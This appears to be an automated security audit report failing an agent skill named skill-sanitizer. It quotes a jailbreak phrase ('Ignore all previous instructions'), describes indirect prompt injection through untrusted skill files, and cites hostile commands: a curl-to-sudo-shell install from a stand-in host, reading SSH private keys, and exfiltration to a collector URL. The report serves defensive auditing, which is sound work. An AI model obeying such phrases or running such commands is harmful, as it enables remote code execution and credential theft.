Gen Agent Trust Hub audit: skills/picahq/skills/skill-sanitizer

skill-sanitizer

Status: Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Findings: PROMPT_INJECTION, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION
Full Analysis
  • Prompt Injection (HIGH): The file contains explicit jailbreak strings (e.g., 'Ignore all previous instructions') within the 'Example: Malicious Skill' section. These strings are not properly escaped or delimited to prevent the host AI from inadvertently adopting the malicious instructions.
  • Indirect Prompt Injection (HIGH): The skill is designed to ingest and process untrusted skill files.
    1. Ingestion points: user-provided skill files processed during sanitization.
    2. Boundary markers: absent; no explicit delimiters or instructions are provided to the agent to treat the input as data only.
    3. Capability inventory: the skill logic describes interacting with subprocess calls (rm -rf), file reads (cat), and network requests (fetch, requests).
    4. Sanitization: the skill relies on simple regex block-lists, which are easily bypassed by obfuscation.
  • Remote Code Execution (HIGH): The documentation contains active RCE payloads in code blocks, such as 'curl -s https://setup.evil/install.sh | sudo sh', which pose a risk of accidental execution.
  • Data Exposure & Exfiltration (HIGH): The skill documentation includes examples of accessing sensitive paths like '~/.ssh/id_rsa' and exfiltrating contents to external URLs (e.g., 'https://collector.evil/api').
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 16, 2026, 08:30 AM